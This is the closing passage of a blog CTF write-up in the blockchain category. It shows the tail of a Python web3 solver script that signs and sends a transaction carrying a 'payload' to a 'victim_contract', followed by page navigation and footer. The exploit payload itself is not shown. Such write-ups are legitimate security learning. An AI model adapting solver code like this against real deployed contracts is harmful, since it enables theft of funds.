    <span class="token string">'from'</span><span class="token punctuation">:</span> account_from<span class="token punctuation">[</span><span class="token string">'address'</span><span class="token punctuation">]</span><span class="token punctuation">,</span>
    <span class="token string">'to'</span><span class="token punctuation">:</span> Web3<span class="token punctuation">.</span>to_checksum_address<span class="token punctuation">(</span>victim_contract<span class="token punctuation">)</span><span class="token punctuation">,</span>
    <span class="token string">'nonce'</span><span class="token punctuation">:</span> web3<span class="token punctuation">.</span>eth<span class="token punctuation">.</span>get_transaction_count<span class="token punctuation">(</span>account_from<span class="token punctuation">[</span><span class="token string">'address'</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">,</span>
    <span class="token string">'gasPrice'</span><span class="token punctuation">:</span> web3<span class="token punctuation">.</span>eth<span class="token punctuation">.</span>gas_price<span class="token punctuation">,</span>
    <span class="token string">'value'</span><span class="token punctuation">:</span> <span class="token number">0</span><span class="token punctuation">,</span>
    <span class="token string">'data'</span><span class="token punctuation">:</span> payload<span class="token punctuation">,</span>
    <span class="token string">'chainId'</span><span class="token punctuation">:</span> web3<span class="token punctuation">.</span>eth<span class="token punctuation">.</span>chain_id<span class="token punctuation">,</span>
<span class="token punctuation">&#125;</span>
solver_tx<span class="token punctuation">.</span>update<span class="token punctuation">(</span><span class="token punctuation">&#123;</span><span class="token string">'gas'</span><span class="token punctuation">:</span> <span class="token number">30000000</span><span class="token punctuation">&#125;</span><span class="token punctuation">)</span>

<span class="token comment"># 8. Sign tx with PK</span>
tx_create <span class="token operator">=</span> web3<span class="token punctuation">.</span>eth<span class="token punctuation">.</span>account<span class="token punctuation">.</span>sign_transaction<span class="token punctuation">(</span>solver_tx<span class="token punctuation">,</span> account_from<span class="token punctuation">[</span><span class="token string">'private_key'</span><span class="token punctuation">]</span><span class="token punctuation">)</span>

<span class="token comment"># 9. Send tx and wait for receipt</span>
tx_hash <span class="token operator">=</span> web3<span class="token punctuation">.</span>eth<span class="token punctuation">.</span>send_raw_transaction<span class="token punctuation">(</span>tx_create<span class="token punctuation">.</span>rawTransaction<span class="token punctuation">)</span>
tx_receipt <span class="token operator">=</span> web3<span class="token punctuation">.</span>eth<span class="token punctuation">.</span>wait_for_transaction_receipt<span class="token punctuation">(</span>tx_hash<span class="token punctuation">)</span>

<span class="token keyword">print</span><span class="token punctuation">(</span><span class="token string-interpolation"><span class="token string">f'Tx successful with hash: </span><span class="token interpolation"><span class="token punctuation">&#123;</span> tx_receipt<span class="token punctuation">.</span>transactionHash<span class="token punctuation">.</span><span class="token builtin">hex</span><span class="token punctuation">(</span><span class="token punctuation">)</span> <span class="token punctuation">&#125;</span></span><span class="token string">'</span></span><span class="token punctuation">)</span></code></pre>
    </div>
     
    <div class="post-footer__meta"><p>updated at 2023-09-21</p></div> 
    <div class="post-entry__tags"><a href="/tags/writeup/" class="post-tags__link button"># writeup</a><a href="/tags/blockchain/" class="post-tags__link button"># blockchain</a></div> 
</article>


    <div class="nav">
        <div class="nav__prev">
            
                <a href="/2023/12/20/TCTF-0CTF-Parsing-Writeup/" class="nav__link">
                    <div>
                        <svg viewBox="0 0 1024 1024" xmlns="http://www.w3.org/2000/svg" width="24" height="24"><path d="M589.088 790.624L310.464 512l278.624-278.624 45.248 45.248L400.96 512l233.376 233.376z" fill="#808080"></path></svg>
                    </div>
                    <div>
                        <div class="nav__label">
                            Previous Post
                        </div>
                        <div class="nav__title">
                            TCTF/0CTF Parsing Writeup
                        </div>
                    </div>
                </a>
            
        </div>
        <div class="nav__next">
            
                <a href="/2023/04/05/XCTF%20Final%20flappy-bird-cheat/" class="nav__link">
                    <div>
                        <div class="nav__label">
                            Next Post
                        </div>
                        <div class="nav__title">
                            XCTF Final flappy-bird-cheat
                        </div>
                    </div>
                    <div>
                        <svg viewBox="0 0 1024 1024" xmlns="http://www.w3.org/2000/svg" width="24" height="24"><path d="M434.944 790.624l-45.248-45.248L623.04 512l-233.376-233.376 45.248-45.248L713.568 512z" fill="#808080"></path></svg>
                    </div>
                </a>
            
        </div>
    </div>





</main>

            <footer class="footer">
     
    <a href="#" class="button" id="b2t" aria-label="Back to Top" title="Back to Top">
        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 1024 1024" width="32" height="32">
            <path d="M233.376 722.752L278.624 768 512 534.624 745.376 768l45.248-45.248L512 444.128zM192 352h640V288H192z" fill="currentColor"></path>
        </svg>
    </a>

    


    
     
 

 
    
        
        <p class="footer-copyright">
            Copyright © 2024 <a href="/">arcovegle&#39;s blog</a>
        </p>
    
    
</footer>

        </div>
        
    <script defer src="https://cdn.jsdelivr.net/npm/vanilla-lazyload@17.1.0/dist/lazyload.min.js"></script>
    <script>
        window.lazyLoadOptions = {
            elements_selector: ".lazy",
            threshold: 0
        };
    </script>
 

 

 

 

 



 



 


    
 


    
<script src="https://cdn.jsdelivr.net/npm/jquery@3.4.1/dist/jquery.min.js"></script>

    
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.4.1/dist/jquery.fancybox.min.css">

    
<script src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.4.1/dist/jquery.fancybox.min.js"></script>

    <script>
        let lazyloadT = Boolean('true'),
            auto_fancybox = Boolean('true')
        if (auto_fancybox) {
            $(".post__content").find('img').each(function () {
                var element = document.createElement("a");
                $(element).attr("data-fancybox", "gallery");
                $(element).attr("href", $(this).attr("src"));
                if (lazyloadT) {
                    $(element).attr("href", $(this).attr("data-srcset"));
                }
                $(this).wrap(element);
            });
        } else {
            $(".post__content").find("fancybox").find('img').each(function () {
                var element = document.createElement("a");
                $(element).attr("data-fancybox", "gallery");
                $(element).attr("href", $(this).attr("src"));
                if (lazyloadT) {
                    $(element).attr("href", $(this).attr("data-srcset"));
                }
                $(this).wrap(element);
            });
        }
    </script>
 

 

 

 

 




    </body>
</html>
